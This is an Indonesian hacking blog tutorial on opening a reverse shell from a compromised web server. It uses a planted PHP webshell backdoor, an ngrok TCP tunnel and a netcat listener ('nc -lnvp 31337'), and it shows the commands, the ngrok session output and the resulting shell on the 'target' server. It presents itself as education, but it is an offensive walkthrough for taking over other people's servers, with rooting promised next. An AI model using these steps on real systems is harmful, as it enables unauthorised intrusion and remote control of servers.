Cara Reverse Shell Menggunakan Weevely Di Linux
Weevely adalah PHP web shell backdor yang mensimulasikan koneksi seperti telnet. …
Backconnect atau Reverse Shell biasa di lakukan ketika kita ingin melakukan Rooting Server agar mendapatkan hak aksess ‘root’. Namun perlu kalian ingat, tidak semua website/server dapat melakukan Backconnect. Tapi tidak ada salahnya kalo kita mencobanya.
Pada artikel kali ini yang akan saya bahas bukan cara ‘Rooting Server’ tetapi cara bagaimana agar kita dapat melakukan Backconnect dengan memanfaatkan Ngrok. Untuk memulai peraktik, silahkan download terlebih dahulu Ngrok di website resminya.
Jika semua bahan-bahan diatas sudah kalian siapkan, sekarang waktunya memulai praktik exploitasi, pertama silahkan kalian login atau register disini jika kalian belum mempunyai akun guna mengautentikasi token ngrok.
Untuk cara installasi, sudah tertera pada halaman download ngrok. jadi tinggal kalian ikuti saja cara yang dianjurkan oleh ngrok. sekarang tinggal mengautentikasi token agar ngrok dapat dijalankan.
ngrok authtoken 1zmlm6ea3uU1Kleo8MzPSvV36la_7pEBaDCWxxxxxxxxxxxx
Atau jika kurang jelas silahkan kunjungu link: https://dashboard.ngrok.com/get-started/setup
Kemudian selanjutnya jalankan ngrok tcp, dengan port sesuai keinginan kalian.
ngrok tcp 31337
ngrok by @inconshreveable (Ctrl+C to quit)
Session Status online
Account zidansec@gmail.com (Plan: Free)
Version 2.3.40
Region United States (us)
Web Interface http://127.0.0.1:4040
Forwarding tcp://0.tcp.ngrok.io:11305 -> localhost:31337
Connections ttl opn rt1 rt5 p50 p90
1 0 0.01 0.00 0.00 0.00
Jika ngrok berjalan dengan baik maka tampilannya akan seperti itu.
Netcat sangat berperan penting ketika kita ingin melakukan Backconnect Server, jika kalian pengguna linux netcat sudah terinstall secara otomatis dengan perintah ’nc’. Jika kalian pengguna window, kalian harus menginstall dulu netcat. Karna saya memakai Linux, maka saya akan melanjutkan tutorial ini sebagai pengguna OS Linux.
nc -lnvp 31337
Untuk port pada konfigurasi netcat, silahkan kalian sesuaikan dengan port yang kalian gunakan ketika menjalankan ngrok tadi. disini saya memakai port ‘31337’ untuk konfigurasi Ngrok dan Netcat.
Setelah ngrok dan netcat sudah terkonfigurasi dengan benar, sekarang waktunya eksekusi. akses backdor kalian, Ingat pada webshell yang kalian gunakan harus memiliki fitur “Backconnect” jika tidak punya bisa kalian pakai webshell yang saya bagikan diatas.
Kemudian klik tools Backconnect pada webshell yang kalian gunakan, jika pada webshell yang saya bagikan diatas tools bertuliskan ‘Network’, lalu pada bagian server kalian isi dengan Forwarding ngrok kalian contohnya 0.tcp.ngrok.io dan untuk portnya kalian isi dengan port porwarding ngrok punya kalian contoh 11305, untuk method backconnect kalian pilih perl jika ada. Jika tidak ada kalian pakai c*,python,php* atau yang lainnya. kemudian klik tombol submit.
Kemudian cek netcat, jika Bckconnect berhasil maka tampilannya akan seperti ini:
┌─[zidan@ubuntu] ∞ [~]>
└─[$]> nc -lnvp 31337
Listening on 0.0.0.0 31337
Connection received on 127.0.0.1 50912
sh: cannot set terminal process group (3715): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.0$
Sekarang kita coba jalankan perintah uname -a untuk melihat informasi OS yang di pakai oleh server target, atau kalian bisa menggunakan command lainnya untuk melakukan test.
Tinggal rooting server jika kalian ingin memiliki hak akses penuh pada server target, namun sangat jarang sekali server yang bisa kita exploitasi untuk mendapatkan hak akses penuh. Next time saya akan buatkan caranya rooting server. Sekian dulu edukasi kali ini.
Silahkan berkomentar, atau berdiskusi secara anonim pada halaman live chat yang ada di blog untuk bertanya atau request tutorial hacking lainnya.